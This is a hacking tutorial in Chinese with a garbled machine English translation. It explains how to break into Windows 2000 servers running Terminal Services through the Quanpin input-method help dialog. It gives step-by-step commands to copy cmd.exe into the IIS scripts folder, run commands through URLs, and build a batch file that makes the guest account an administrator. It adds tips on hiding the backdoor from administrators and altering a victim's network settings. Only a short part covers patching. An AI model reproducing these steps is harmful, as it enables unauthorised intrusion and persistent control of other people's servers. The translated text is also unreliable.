由于微软对中国产品不付责任的态度,使得安装了终端服务和全拼(^^我只在全拼下成功)的w2k 服务器存在着远程登陆并能获取超级用户权限的严重漏洞。 Since Microsoft does not pay duty on Chinese products, the attitude, making the installation of Terminal Services and spelling (spelling ^ ^ I have only successfully) the existence of the w2k server remote login and have access to superuser privileges serious flaws.
小女子几经周折、胆战心惊、多次尝试,终于明白个中道理,不需上传任何文件成功入侵并装个后门(现在流行走后门^^)。 Small woman twists and turns, frightened, many attempts, finally realized that one in truth, without any file upload successfully invaded and installed a back door (back door now popular ^ ^).
其过程如下: The process is as follows:
1.扫描3389 port 终端服务默认; 1 Scan the default 3389 port terminal services;
2.用终端客户端程序进行连接; 2 with the terminal client to connect;
3.按ctrl+shift调出全拼输入法(其他似乎不行),点鼠标右键(如果其帮助菜单发灰,就赶快赶下家吧,人家打补丁了),点帮助,点输入法入门; 3 press ctrl + shift recall spelling of input methods (other seems to work), right click (if the Help menu, gray, they quickly catch the next house it, people patching), points to help entry-point input method;
4.在"选项"菜单上点右键--->跳转到URL",输入:c:\winnt\system32\cmd.exe.(如果不能确定NT系统目录,则输入:c:\ 或d:\ ……进行查找确定); 4 In the "Options" menu, right click ---> Go to URL ", enter: c: \ winnt \ system32 \ cmd.exe. (If you can not determine the NT system directory, enter: c: \ or d : \ ... ... determined to find);
5.选择"保存到磁盘" 选择目录:c:\inetpub\scripts\,因实际上是对方服务器上文件自身的复制操作,所以这个过程很快就会完成; 5 Select "Save to Disk" Select the directory: c: \ inetpub \ scripts \, because the other files on the server is actually a copy of their own operation, so this process will soon be finished;
6.打开IE,输入:http://ip/scripts/cmd.exe?/c dir 怎么样? 6 Open IE, enter: http://ip/scripts/cmd.exe?/c dir how? 有cmd.exe文件了吧? There cmd.exe file, right? 这我们就完成了第一步; This we have done the first step;
7.http://ip/scripts/cmd.exe?/c echo net user guest /active:yes>go.bat 7.http: / / ip / scripts / cmd.exe? / C echo net user guest / active: yes> go.bat
8.http://ip/scripts/cmd.exe?/c echo net user guest elise>>go.bat 8.http: / / ip / scripts / cmd.exe? / C echo net user guest elise>> go.bat
9.http://ip/scripts/cmd.exe?/c echo net localgroup administrators /add guest>>go.bat 9.http: / / ip / scripts / cmd.exe? / C echo net localgroup administrators / add guest>> go.bat
10.http://ip/scripts/cmd.exe?/c type go.bat 看看我们的批文件内容是否如下: 10.http: / / ip / scripts / cmd.exe? / C type go.bat look at our batch file content is as follows:
net user guest /active:yes net user guest / active: yes
net user guest elise net user guest elise
net localgroup administrators /add guest net localgroup administrators / add guest
11.在"选项"菜单上点右键--->跳转到URL",输入:c:\inetpub\scripts\go.bat --->在磁盘当前位置执行; 11 In the "Options" menu, right click ---> Go to URL ", enter: c: \ inetpub \ scripts \ go.bat ---> location of the disk current implementation;
12.呵呵,大功告成啦,这样我们就激活了服务器的geust帐户,密码为:elise,超级用户呢! 12 Oh, you're done you, so we activated the server geust account password is: elise, super-user too! (我喜欢guest而不是建立新帐户,这样似乎不易被发现些),这样你就可用IPC$连接,想怎样做就怎样做了,当然,你也可用guest直接登陆到他的服务器,到他机器上去跳舞吧:) (I like the guest, rather than create a new account, so it seems more difficult to be found), so that you can use the IPC $ connection, what do you want to do, of course, you can log in directly to his guest server to his machine dancing it up:)
注意事项: Note:
1.当你用终端客户端程序登陆到他的服务器时,你的所有操作不会在他的机器上反应出来,但如果他正打开了终端服务管理器,你就惨了了:(这时他能看到你所打开的进程id、程序映象,你的ip及机器名,并能发消息给你! 1 When you use the terminal client to his server log, you will not be all operations reflected on his machine, but if he is to open the Terminal Services Manager, you will suffer: the (then He can see you open the process id, process mapping, your ip and machine name, and can be a message to you!
2.当你连接时,会加重对方服务器的负荷,非常容易造成对方死机和断线,所以你的操作快点为妙,小女子为此不知浪费了多少的网费和精力。 2 When you connect, it will increase the load on each server, the other very easily lead to crashes and broken, so your operation quickly is wonderful, this small woman, I do not know how much of a waste of network charges and energy.
3.尽快做好后门,暂时不要上传任何程序,一是防止断线,二是防止对方打上补丁! 3 to do the back door as soon as possible and not to upload any program, one to prevent disconnection, and second, to prevent the other patches! 小女子可就这样吃亏过一次,上传木马中断没有完成,第二天,人家已打上补丁,再也无法进入! This small woman may lose once, upload Trojans interrupt is not completed, the next day, people have been patched and could not enter! 并且还留下了xxxx……:( And also left a xxxx ... ...: (
个人观点: Personal opinion:
1.在IE下,所拥有的只是iusr_machine权限,因而,你不要设想去做越权的事情,如启动telnet、木马等; 1 in IE, just iusr_machine have permission, therefore, do not imagine things to do ultra vires, such as start telnet, Trojan horses, etc.;
2.url的跳转下,你将拥有超级用户的权限,好好利用吧:) 2.url jump, you will have super-user privileges, take advantage of it:)
3.跳转到哪个目录下,通常只能查看、执行当前目录的文件,不能进入到子目录,如想进入,再跳一次吧! 3 Go to the directory which is usually only see the implementation of the current directory of files, can not enter into a subdirectory, if one wants to enter, jump again! :) :)
4.此法似乎与对方的防火墙无关哦! 4 This method seems the firewall has nothing to do with each other Oh!
堵漏办法: Sealing methods:
1.打补丁; 1 patch;
2.删掉全拼输入法,用标准就成了嘛^^; (2) delete the spelling of input method, it becomes a standard thing ^ ^;
3.服务中关掉:Terminal Services,服务名称:TermService,对应程序名:system32\termsrv.exe;(如果哪天你潜入服务器,发现了termsrv.exe文件,而又没探测到3389端口,你知道该怎样做了吧?^^) 3 services off: Terminal Services, Service Name: TermService, corresponding to the program name: system32 \ termsrv.exe; (if one day you sneaked into the server and found termsrv.exe file, but powerless to detect port 3389, you know What should I do now? ^ ^)
问题(高手请赐教): Problem (expert please enlighten me):
1.如果IE下的www访问需要密码,怎办? 1 If the IE under the www access requires a password, what can we do?
2.如果对方不开www服务怎办? 2 If they do not open the www service we do? 我试过了直接跳转url:net user hack elise /add命令,不能成功! I tried to jump url: net user hack elise / add command, can not succeed!
3.如果对方139 port不开,有什么办法打开吗? 3 If the other 139 port not open, there is any way to open it? w2k server中怎样控制139端口? w2k server in how to control the 139 port?
答案: Answer:
1.跳至url:\winnt\system32 (系统目录在跳至url上已显示出来啦!!) 1 Skip url: \ winnt \ system32 (system directory is displayed on the url in the jump out of it!!)
2.选中net.exe文件,点右键--->创建快键方式--->在快捷方式下点右键--->快捷方式的目标后加入:user guest /active:yes ,其他的不用再说了吧:) 2 Select the net.exe file, right click ---> key way to create fast ---> right click the shortcut to the next ---> target of the shortcut by adding: user guest / active: yes, others no say it:)
此方法避开了我的1.2两个问题哦! This method avoids two problems Oh my 1.2! ! !
得出结论: Concluded that:
1.你虽可运行程序,但无法看见,所以对交互式得程序得另想办法哦,:)如regedt32、notepad等; 1 Although you can run the program, but can not see, so get interactive programs resort to other means oh,:), such as regedt32, notepad, etc.;
2.快捷方式是执行程序得好途径。 2 is a shortcut way to implement the program well.
ps.我的第3个关于139port问题的答案似乎再这里: ps. My first three questions on 139port seems to be here:
我用guest登陆到对方的服务器,打开拨号网络的属性,嘿,发现他的文件打印共享和微软网络客户没打勾呢! I use the guest login to the other side of the server, open the dial-up networking properties, hey, found his file and print sharing and Client for Microsoft Networks did not check it! ! ! 他偷懒,那我帮他勾上了:) 不过,他得重新拨号才有效哦! He was lazy, that I helped him on the hook:) However, he had to re-dial to be effective Oh! 不知道这时他得139开了否,我没时间等他再拨号了。 Do not know when he had opened 139 No, I did not time him to dial up. (如你想断开他得拨号会出错得哦,因为我试过了;p) (If you want to disconnect dial-up he had to be wrong oh, because I tried; p)
Tidak ada komentar:
Posting Komentar